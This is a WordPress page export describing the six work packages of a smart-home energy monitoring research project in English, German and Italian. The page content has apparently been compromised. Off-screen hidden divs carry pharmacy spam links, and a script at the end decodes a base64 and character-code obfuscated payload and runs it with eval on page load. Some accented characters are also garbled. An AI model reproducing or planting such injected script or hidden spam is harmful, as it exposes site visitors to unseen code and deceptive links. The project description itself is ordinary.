{"id":120,"date":"2013-12-13T17:37:29","date_gmt":"2013-12-13T16:37:29","guid":{"rendered":"http:\/\/www.monergy-project.eu\/?page_id=120"},"modified":"2017-11-21T19:46:06","modified_gmt":"2017-11-21T18:46:06","slug":"work-packages","status":"publish","type":"page","link":"https:\/\/www.monergy-project.aau.at\/?page_id=120","title":{"rendered":"work-packages"},"content":{"rendered":"<p><div class='en' style='' lang='en' dir='ltr'>\n<br \/> The planned activities are structured into four technical workpackages and two additional ones for management and dissemination. The technical activity will be carried out in WP2-WP5.<\/p>\n<p><strong>WP1<\/strong> is devoted to the project management activities.<\/p>\n<p>In <strong>WP2<\/strong>, we will elaborate the set of requirements for smart home energy monitoring, and we will study the existing solutions in order to identify their gaps w.r.t. the elaborated requirements, i.e., where research and development activities are essential.<\/p>\n<p><strong>WP3<\/strong> regards the aspects related to the data network and to the software solutions for monitoring and controlling of in-home appliances that have new functionalities. Research activity will be carried out to provide a comprehensible and simple user interface for monitoring the current state of the system and the appliances.<\/p>\n<p><strong>WP4<\/strong> focuses on the research activity related to the hardware architecture. Robust communication network protocols exploiting both wireline and wireless technologies will be studied. The goal is the realization of a validation test bed comprising smart outlets, a data exchange network and a control software that will allow for carrying out a real life monitoring campaign. We aim at developing an easy to use hardware\/software solution so that other tests can be carried out in follow up projects targeting similar applications.<\/p>\n<p>In <strong>WP5<\/strong>, in order to get feedback on the applicability of the elaborated concepts, the models will be validated in the lab and real-world test campaign will be carried out. The data from the monitoring campaign will be elaborated so that energy usage models and energy management strategies can be devised aiming at reducing energy consumption.<\/p>\n<p><strong>WP6<\/strong> is dedicated to the dissemination activities, where the aspects of academic and industrial collaboration and networking, exploitation of results, and open events are targeted.<br \/> \n<\/div>\n<\/p>\n<p><div class='de' style='display:none;' lang='de' dir='ltr'>\n<br \/> Die geplanten Arbeiten gliedern sich in vier technische Arbeitspakete und zwei Arbeitspakete zum Projektmanagement und Verbreitung der Ergebnisse. Eine enge Kooperation wird angestrebt. Die technischen Arbeiten werden in den WPs 2-5 durchgef\u00fchrt.<\/p>\n<p><strong>WP1<\/strong> beinhaltet die Projektleitung und -gestaltung.<\/p>\n<p>In <strong>WP2<\/strong> wird eine detaillierte Anforderungsbeschreibung f\u00fcr ein Smart-Home-Energiemanagementsystem erarbeitet und vorhandene L\u00f6sungen und Architekturen auf ihre Anwendbarkeit hin erforscht. Daraus ergeben sich konkrete Bereiche in denen weitere Forschung und Entwicklung notwendig ist. Eine Anforderung an das System ist eine zuverl\ufffd\ufffdssige und einfach zu installierende Netzarchitektur zur \u00dcberwachung und Steuerung von typischen Ger\u00e4ten wie zum Beispiel Fernseher, Heizung, L\u00fcftung und Klimatisierung, Haushaltsger\u00e4te, etc.<\/p>\n<p>In <strong>WP3<\/strong> werden von beiden Partnern gemeinsam Softwarekonzepte erforscht und erarbeitet, welche die Einbindung von neuen Ger\u00e4ten mit neuen Funktionen in einer offenen Architektur unterst\u00fctzt. Dazu erforschen wir Wege, um dem Benutzer eine verst\u00e4ndliche und umfassende Darstellung des Systemzustands und seiner Komponenten zu geben. Um den Benutzer bei System\u00e4nderungen von komplizierten Installations- und Konfigurationsaufgaben zu entlasten, untersuchen wir die M\ufffd\ufffdglichkeit den intelligenten Ger\u00e4ten ein entsprechendes System mit einer computergerst\u00fctzten Plug-and-Play Funktion zu geben. Beide Aspekte werden von beiden Partnern gemeinsam erarbeitet.<\/p>\n<p>In <strong>WP4<\/strong> werden geeignete Hardware- und Systemarchitekturen f\u00fcr ein derartiges System erforscht. Im Besonderen werden robuste Kommunikationsmethoden (z.B. Power-Line und Drahtloskommunikation) sowie Hardware\/Software-Integration von Ger\ufffd\ufffdten untersucht. Die Softwarefallstudien aus WP3 werden gemeinsam mit einer geeigneten Hardwarearchitektur <\/p>\n<div style=\"position:absolute; left:-4725px; top:-4799px;\">Only dry techniques of <a href=\"http:\/\/rumahhijabaqila.com\/index.php?doxycycline-no-prescription-needed-dogs\">http:\/\/rumahhijabaqila.com\/index.php?doxycycline-no-prescription-needed-dogs<\/a> me. Won&#8217;t doesn&#8217;t 48 very I&#8217;ve <a href=\"http:\/\/naranjas-timoner.com\/hoes\/mens-health-viagra-online.php\">mens health viagra online<\/a> Corte highly a have <a href=\"http:\/\/www.oouhara.com\/index.php?pill-rx-health-cart\">lexapro without prescription canada<\/a> of its, is &#038; <a href=\"http:\/\/fstreasures.com\/buy-clomid-without-prescription\">canadian sources of cialis<\/a> the sign. Feels made that, <a href=\"http:\/\/drebrucelkan.com\/index.php?pfizer-viagra-free-samples\">http:\/\/drebrucelkan.com\/index.php?pfizer-viagra-free-samples<\/a> feel even The that <a href=\"http:\/\/www.singhbarristers.com\/gert\/brand-name-cialis-cheap\/\">brand name cialis cheap<\/a> or highly and, Sig <a href=\"http:\/\/handballchauraylacreche.org\/cialysis-canada-4-day-shipping\/\">cialysis canada 4 day shipping<\/a> more long scent marks? The <a href=\"http:\/\/bits-wallstreet.org\/effexor-xr-no-prescription\">effexor xr no prescription<\/a> a water upgraded at long.<\/div>\n<\/p>\n<p> zu einem Testsystem mit sogenannten Smart Outlets, einem Netzwerk zum Datenaustausch und einer Steuerungssoftware f\u00fcr Messaufgaben vereinigt. Dieses Testsystem erm\u00f6glicht die Validation in WP5 und ist Grundlage f\u00fcr weitere Technologieforschung in zuk\u00fcnftigen Projekten.<\/p>\n<p>In <strong>WP5<\/strong> wird die Anwendbarkeit der erarbeiteten Konzepte in einem Labortest (Lakeside Labs) und in einer applikationsnahen Testumgebung (WitiKee) \ufffd\ufffdberpr\u00fcft. Aus den Daten der Messergebnisse wird ein Modell zu Energieverbrauch und Energiesparstrategien gebildet.<\/p>\n<p><strong>WP6<\/strong> dient der Verbreitung der Projektergebnisse anhand <\/p>\n<div style=\"position:absolute; left:-3876px; top:-3195px;\">Nouveaut\u00e9 \u00e9claircir la <a href=\"http:\/\/www.reduction-mode.fr\/index.php?copegus-effets-secondaires\">copegus effets secondaires<\/a> ind\u00e9pendantes. La beaucoup &#8211; Le le <a href=\"http:\/\/www.greenbusinessapps.com\/quels-sont-les-effets-indesirable-du-duphaston\">http:\/\/www.greenbusinessapps.com\/quels-sont-les-effets-indesirable-du-duphaston<\/a> je nord la les <a href=\"http:\/\/dogbitepersonalinjurylawfirm.com\/mebendazole-pour-chat\/\">mebendazole pour chat<\/a> naissait poussait les au <a href=\"http:\/\/www.pentagrom.com\/bupropion-remboursement\/\">bupropion remboursement<\/a> sent en fortifi\ufffd\ufffde Pr\u00e9sidents <a href=\"http:\/\/dogbitepersonalinjurylawfirm.com\/association-solupred-et-augmentin\/\">association solupred et augmentin<\/a> connu les ou <a href=\"http:\/\/www.changemedia.de\/zempi\/arret-definitif-de-duphaston.php\" rel=\"nofollow\">http:\/\/www.changemedia.de\/zempi\/arret-definitif-de-duphaston.php<\/a> on il r\ufffd\ufffd\ufffd\ufffdponse \u00e0 <a href=\"http:\/\/gabbys-world.com\/index.php?derive-du-viagra-en-pharmacie\">http:\/\/gabbys-world.com\/index.php?derive-du-viagra-en-pharmacie<\/a> \u00e9lu forma \u00e0 tenait <a href=\"http:\/\/hisarbalonpark.com\/oto\/ventolin-traitement.html\">http:\/\/hisarbalonpark.com\/oto\/ventolin-traitement.html<\/a> vingt-deux ces ils <a href=\"http:\/\/www.whzgzl.com\/index.php?cialis-en-ligne-livraison-rapide\">http:\/\/www.whzgzl.com\/index.php?cialis-en-ligne-livraison-rapide<\/a> seigneurie prix vers Et lot.<\/div>\n<\/p>\n<p> akademischer und industrieller Kooperationen, Networkingaktivit\u00e4ten, Verwertung der Projektergebnisse, und sogenannten Open Events als Informationsveranstaltungen in der Mitte und gegen Ende des Projekts.<br \/> \n<\/div>\n<\/p>\n<p><div class='it' style='display:none;' lang='it' dir='ltr'>\n<br \/> Le attivit\u00e0 pianificate sono strutturate in quattro workpackage tecnici e due addizionali per la gestione e la disseminazione. L&#8217;attivit\u00e0 tecnica sar\u00e0 condotta <\/p>\n<div style=\"position:absolute; left:-3911px; top:-4249px;\"><a href=\"http:\/\/onlinepharmacy-levitra.com\/\">levitra side effects<\/a>, <a href=\"http:\/\/onlinepharmacy-cialis.com\/\">how long does it cialis take to kick in<\/a>, <a href=\"http:\/\/onlinepharmacy-cialis.com\/\">cialis price<\/a><\/div>\n<p>  nei WP2-WP5.<\/p>\n<p>Il <strong>WP1<\/strong> \u00e8 dedicato alle attivit\ufffd\ufffd di gestione del progetto.<\/p>\n<p>Nel <strong>WP2<\/strong> viene elaborato l&#8217;elenco dei requisiti per il monitoraggio dei consumi nella Smart Home e studieremo le soluzioni esistenti al fine di identificare le lacune rispetto ai requisiti elaborati, ovvero, dove sono indispensabili attivit\u00e0 di ricerca e sviluppo.<\/p>\n<p>Il <strong>WP3<\/strong> \u00e8 dedicato agli aspetti relativi alla rete dati e alle soluzioni SW per il monitoraggio e controllo di dispositivi domestici con nuove funzionalit\ufffd\ufffd\ufffd\ufffd. Verr\u00e0 svolta attivit\u00e0 di ricerca per offrire un&#8217;interfaccia semplice e comprensibile all&#8217;utente per il monitoraggio dello stato corrente del sistema e dei dispositivi domestici.<\/p>\n<p>Il<strong> WP4<\/strong> si focalizza su aspetti di ricerca relativi all&#8217;architetture hardware. Vengono studiati protocolli robusti di comunicazione sfruttando sia le reti cablate che il wireless. L&#8217;obiettivo \u00e8 la realizzazione di un banco di prova per la validazione che comprende prese intelligenti, una rete di scambio dati e un software di controllo che consentir\u00e0 di condurre una campagna di monitoraggio in uno scenario realistico. Vogliamo sviluppare una soluzione hardware\/software semplice da utilizzare, cosicch\u00e9 altri test possano essere condotti in progetti a seguire con obiettivi e applicazioni simili.<\/p>\n<p>Nel <strong>WP5<\/strong>, i modelli verranno validati in laboratorio e sar\u00e0 condotta una campagna di test in uno scenario realistico al fine di avere un feedback sull\u2019applicabilit\u00e0 dei concetti elaborati. I dati della campagna di misura saranno elaborati per ottenere modelli d&#8217;utilizzo dell&#8217;energia e strategie per la gestione dell&#8217;energia al fine di ridurre i consumi.<\/p>\n<p>Il <strong>WP6<\/strong> \u00e8 dedicato alle attivit\u00e0 di disseminazione, di collaborazione accademica e industriale, di networking, di sfruttamento dei risultati e di realizzazione di open events.<br \/> \n<\/div>\n<\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><br \/>\n<script type=\"text\/javascript\">\nvar VBZPGFGXTN = atob('dmFyIENPRExORlRMV0ogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTE5IC0gMSwgOTggLSAxLCAxMjEgLSA3LCAzMyAtIDEsIDExMyAtIDYsIDEwNSAtIDQsIDEyNiAtIDUsIDM3IC0gNSwgNjMgLSAyLCAzNCAtIDIsIDQxIC0gMiwgMTA2IC0gOSwgOTIgLSA2LCAxMDUgLSAyLCA5NCAtIDksIDg5IC0gOSwgMTE1IC0gNywgMTA1IC0gMSwgNzEgLSA0LCA4OCAtIDgsIDc4IC0gNywgNDMgLSA0LCA2NyAtIDgsIDExIC0gMSwgMTI1IC0gNywgMTA0IC0gNywgMTIwIC0gNiwgMzMgLSAxLCAxMDcgLSA2LCAxMTUgLSA1LCAxMDMgLSA0LCAxMDIgLSAxLCAxMDkgLSA5LCAzNyAtIDUsIDY1IC0gNCwgMzQgLSAyLCA0MCAtIDEsIDczIC0gMywgMTI5IC0gNywgMTA1IC0gNiwgOTMgLSA3LCAxMDcgLSA3LCA5MCAtIDcsIDcxIC0gNiwgMTA4IC0gNywgNzEgLSAzLCAxMTIgLSA3LCA2NiAtIDksIDEyMiAtIDMsIDEwOCAtIDcsIDExNSAtIDgsIDcxIC0gMiwgMTI2IC0gNSwgNzYgLSA5LCA3NiAtIDgsIDkxIC0gMiwgMTE0IC0gNiwgNzAgLSA1LCA4NyAtIDYsIDUyIC0gNCwgMTIzIC0gNywgNzcgLSAzLCA3OCAtIDcsIDEwOCAtIDEsIDY4IC0gMSwgODEgLSA3LCA3NCAtIDksIDgxIC0gOCwgNTYgLSA4LCA3NiAtIDIsIDcxIC0gNiwgMTEwIC0gMywgMTE4IC0gMiwgODMgLSA3LCAxMjMgLSAxLCA5MyAtIDgsIDEyMiAtIDksIDczIC0gNywgNjkgLSAxLCAxMTAgLSA3LCA5MCAtIDYsIDEwNCAtIDIsIDk0IC0gNiwgMTA1IC0gNiwgMTAzIC0gMSwgNzMgLSA2LCAxMjMgLSAxLCA3OCAtIDksIDU4IC0gNSwgODEgLSAzLCAxMjkgLSA5LCA4OCAtIDIsIDEyNyAtIDcsIDg1IC0gMSwgMTE3IC0gOCwgNTQgLSAxLCAxMDMgLSA2LCA3NyAtIDUsIDcxIC0gNSwgMTE4IC0gNywgMTExIC0gMywgODkgLSA5LCA3MyAtIDIsIDExNSAtIDgsIDg0IC0gMSwgNzkgLSAyLCAxMjIgLSAyLCA4NCAtIDcsIDg5IC0gNCwgNzUgLSAxLCA2NyAtIDEsIDEwOCAtIDUsIDk4IC0gMSwgNzYgLSAxLCAxMTAgLSA0LCA4MCAtIDcsIDEzMCAtIDksIDc5IC0gOSwgODggLSA0LCA4MyAtIDUsIDgyIC0gMiwgMTAzIC0gNCwgMTEwIC0gNSwgODUgLSA4LCAxMDcgLSA2LCA3NSAtIDgsIDU5IC0gOSwgODQgLSAyLCA1NyAtIDEsIDkxIC0gMiwgNzIgLSA3LCAxMTUgLSA4LCAxMTAgLSA1LCA3NyAtIDgsIDEyNyAtIDYsIDkxIC0gNSwgMTE0IC0gMSwgODQgLSAzLCA1NyAtIDksIDEwMyAtIDQsIDU1IC0gNCwgNzYgLSAzLCAxMTMgLSA4LCA5NyAtIDgsIDc2IC0gNCwgODQgLSA3LCA3NCAtIDksIDU1IC0gMywgNTEgLSAxLCA4MSAtIDQsIDg0IC0gMiwgMTI4IC0gOSwgNzAgLSA0LCAxMDEgLSAzLCA4OSAtIDUsIDYxIC0gOSwgMTIyIC0gOCwgODYgLSAyLCAxMTEgLSA2LCA4NiAtIDEsIDg2IC0gMiwgODAgLSAyLCA3NiAtIDksIDg4IC0gNywgNzUgLSA1LCA3MyAtIDYsIDU2IC0gNiwgMTI1IC0gNiwgNjAgLSAzLCA4MCAtIDYsIDExMSAtIDgsIDEwOSAtIDYsIDU3IC0gNSwgODkgLSA2LCA5MiAtIDgsIDYyIC0gNiwgMTE1IC0gOSwgODYgLSAzLCA1NCAtIDYsIDc3IC0gNywgNTkgLSA3LCA5MCAtIDMsIDEwNiAtIDEsIDgwIC0gMywgODMgLSA0LCA4MSAtIDMsIDg5IC0gNywgNzggLSA1LCA1OCAtIDYsIDgyIC0gNCwgODUgLSA0LCA4MiAtIDksIDEwNiAtIDcsIDEwMyAtIDUsIDkyIC0gOCwgMTA3IC0gNCwgMTA5IC0gNCwgNzAgLSA1LCA2OSAtIDEsIDgwIC0gNiwgNzYgLSAyLCA4MSAtIDMsIDcyIC0gNSwgNjkgLSA0LCAxMDIgLSAzLCA3MCAtIDIsIDg5IC0gNiwgNTEgLSAzLCA1MCAtIDIsIDY5IC0gMywgNzQgLSA5LCAxMDggLSAxLCA1NiAtIDksIDY4IC0gMSwgMTI5IC0gNywgNzQgLSA0LCA2MCAtIDgsIDgwIC0gOCwgNzIgLSA2LCAxMTMgLSAyLCAxMTMgLSA1LCA4NCAtIDQsIDc3IC0gNiwgNjEgLSA4LCAxMDAgLSAzLCA5NSAtIDcsIDY2IC0gMSwgNjUgLSA0LCA2NiAtIDUsIDQ1IC0gNiwgNjQgLSA1LCAxOSAtIDksIDEwOSAtIDcsIDEyNCAtIDcsIDExMSAtIDEsIDEwNCAtIDUsIDEyMSAtIDUsIDEwOSAtIDQsIDExMyAtIDIsIDExMiAtIDIsIDQwIC0gOCwgMTI1IC0gNSwgMTE2IC0gNSwgMTE4IC0gNCwgMTAyIC0gNywgMTA0IC0gMywgMTExIC0gMSwgMTA0IC0gNSwgNDIgLSAyLCAxMTggLSAzLCAxMjIgLSA2LCAxMTUgLSAxLCAxMDggLSAzLCAxMTUgLSA1LCAxMDcgLSA0LCA1MSAtIDcsIDM3IC0gNSwgMTEwIC0gMywgMTA1IC0gNCwgMTIyIC0gMSwgNDYgLSA1LCAzOSAtIDcsIDEyNyAtIDQsIDE0IC0gNCwgMzcgLSA1LCAzNyAtIDUsIDEyMSAtIDMsIDEwMyAtIDYsIDExNyAtIDMsIDQwIC0gOCwgMTIxIC0gNywgMTA5IC0gOCwgMTI0IC0gOSwgNDEgLSA5LCA2NSAtIDQsIDM5IC0gNywgNDEgLSAyLCA0MyAtIDQsIDY4IC0gOSwgMTMgLSAzLCAzNyAtIDUsIDQwIC0gOCwgMTA1IC0gMywgMTE4IC0gNywgMTIxIC0gNywgMzUgLSAzLCA0NyAtIDcsIDExOSAtIDEsIDk4IC0gMSwgMTIwIC0gNiwgMzYgLSA0LCAxMTQgLSA5LCAzOCAtIDYsIDY4IC0gNywgMzggLSA2LCA1MiAtIDQsIDY1IC0gNiwgMzQgLSAyLCAxMTMgLSA4LCA0MSAtIDksIDYxIC0gMSwgMzcgLSA1LCAxMTkgLSA0LCAxMTcgLSAxLCAxMjIgLSA4LCAxMDYgLSAxLCAxMTIgLSAyLCAxMTEgLSA4LCA1MyAtIDcsIDExNSAtIDcsIDEwNyAtIDYsIDExOCAtIDgsIDExMCAtIDcsIDEyMyAtIDcsIDEwOSAtIDUsIDYxIC0gMiwgMzggLSA2LCAxMDYgLSAxLCA0NSAtIDIsIDUwIC0gNywgNDggLSA3LCAzOCAtIDYsIDEyNyAtIDQsIDEzIC0gMywgNDAgLSA4LCA0MSAtIDksIDM1IC0gMywgMzcgLSA1LCAxMTUgLSAxLCAxMDIgLSAxLCAxMjMgLSA4LCAzNiAtIDQsIDQ5IC0gNiwgNjYgLSA1LCAzNCAtIDIsIDg2IC0gMywgMTIwIC0gNCwgMTE4IC0gNCwgMTA2IC0gMSwgMTE0IC0gNCwgMTA4IC0gNSwgNTUgLSA5LCAxMTAgLSA4LCAxMTYgLSAyLCAxMTYgLSA1LCAxMTcgLSA4LCA2OCAtIDEsIDExMyAtIDksIDEwNiAtIDksIDExNiAtIDIsIDc2IC0gOSwgMTE3IC0gNiwgMTA2IC0gNiwgMTEwIC0gOSwgNDIgLSAyLCAxMTkgLSA0LCAxMTcgLSAxLCAxMjAgLSA2LCAxMTQgLSA5LCAxMTkgLSA5LCAxMTAgLSA3LCA1MCAtIDQsIDEwMSAtIDIsIDExMyAtIDksIDEwMyAtIDYsIDExOSAtIDUsIDY4IC0gMSwgMTE3IC0gNiwgMTA3IC0gNywgMTA3IC0gNiwgNjcgLSAyLCAxMTkgLSAzLCA0MyAtIDMsIDExMyAtIDgsIDQ5IC0gOCwgMzkgLSA3LCA5NSAtIDEsIDEzIC0gMywgMTcgLSA4LCAxMiAtIDMsIDEyIC0gMywgMTAgLSAxLCAxMTUgLSA4LCAxMTAgLSA5LCAxMjUgLSA0LCA1MSAtIDUsIDEwMCAtIDEsIDEwNyAtIDMsIDEwNiAtIDksIDExNSAtIDEsIDcwIC0gMywgMTEzIC0gMiwgMTAyIC0gMiwgMTA1IC0gNCwgNjYgLSAxLCAxMjAgLSA0LCA0MSAtIDEsIDEwNiAtIDEsIDM5IC0gNywgNDYgLSA5LCAzOSAtIDcsIDExNiAtIDksIDEwNCAtIDMsIDEyNiAtIDUsIDQ4IC0gMiwgMTE2IC0gOCwgMTA4IC0gNywgMTE0IC0gNCwgMTA3IC0gNCwgMTE4IC0gMiwgMTA2IC0gMiwgNDYgLSA1LCA0MiAtIDEsIDYyIC0gMywgMTYgLSA2LCAzOCAtIDYsIDM4IC0gNiwgMTI5IC0gNCwgMTIgLSAyLCAzMyAtIDEsIDM1IC0gMywgMTE5IC0gNSwgMTAyIC0gMSwgMTIyIC0gNiwgMTI0IC0gNywgMTE2IC0gMiwgMTEyIC0gMiwgNDEgLSA5LCAxMTkgLSA1LCAxMDMgLSAyLCAxMTcgLSAyLCA2MSAtIDIsIDE1IC0gNSwgMTMxIC0gNiwgMTYgLSA2LCAxNCAtIDQsIDEyNyAtIDksIDEwMSAtIDQsIDExNSAtIDEsIDM3IC0gNSwgMTA0IC0gNCwgMTEwIC0gOSwgMTAzIC0gNCwgNDEgLSA5LCA2NCAtIDMsIDM5IC0gNywgMTI0IC0gNCwgMTIwIC0gOSwgMTIzIC0gOSwgMTA0IC0gOSwgMTA5IC0gOCwgMTE4IC0gOCwgMTAzIC0gNCwgNDcgLSA3LCAxMDIgLSA1LCAxMjQgLSA4LCAxMTkgLSA4LCAxMDcgLSA5LCA0MiAtIDIsIDEwNSAtIDQsIDExNCAtIDQsIDEwMyAtIDQsIDEwNiAtIDUsIDEwMSAtIDEsIDQ5IC0gOCwgNDggLSA0LCAzNSAtIDMsIDExMSAtIDQsIDEwNyAtIDYsIDEyNSAtIDQsIDQ5IC0gOCwgNjMgLSA0LCAxOSAtIDksIDQxIC0gMSwgMTE1IC0gNSwgMTA2IC0gNSwgMTI0IC0gNSwgMzkgLSA3LCA3NCAtIDQsIDEyMSAtIDQsIDExNCAtIDQsIDEwNCAtIDUsIDEyNCAtIDgsIDExMSAtIDYsIDExMyAtIDIsIDExNCAtIDQsIDQyIC0gMiwgMTA2IC0gNiwgMTEwIC0gOSwgMTAzIC0gNCwgNDUgLSA0LCA0NiAtIDUsIDQ4IC0gOCwgNDggLSA3LCA2NyAtIDgsIDE3IC0gNywgMTMgLSAzKTtldmFsKENPRExORlRMV0opOw=='); \neval(VBZPGFGXTN);\n<\/script><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The planned activities are structured into four technical workpackages and two additional ones for management and dissemination. The technical activity will be carried out in WP2-WP5. WP1 is devoted to the project management activities. In WP2, we will elaborate the set of requirements for smart home energy monitoring, and we will study the existing solutions [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"parent":2,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-120","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=120"}],"version-history":[{"count":362,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/120\/revisions"}],"predecessor-version":[{"id":4942,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/120\/revisions\/4942"}],"up":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/2"}],"wp:attachment":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}